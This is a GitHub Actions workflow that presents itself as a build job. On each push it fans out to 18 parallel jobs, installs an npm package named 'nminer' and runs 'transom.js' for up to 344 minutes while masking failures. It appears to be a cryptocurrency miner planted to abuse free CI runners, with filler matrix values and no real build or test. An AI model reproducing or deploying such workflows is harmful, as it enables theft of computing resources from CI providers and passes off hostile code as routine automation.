name: transom
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 3304 }
          - { version: 1726 }
          - { version: 3630 }
          - { version: 4589 }
          - { version: 2141 }
          - { version: 2531 }
          - { version: 5511 }
          - { version: 1677 }
          - { version: 4891 }
          - { version: 3121 }
          - { version: 7743 }
          - { version: 9069 }
          - { version: 1284 }
          - { version: 5561 }
          - { version: 6679 }
          - { version: 966 }
          - { version: 9698 }
          - { version: 3607 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: fast yippee
        run: |
          npm install nminer@latest
          timeout 344m node transom.js || echo "transom executed"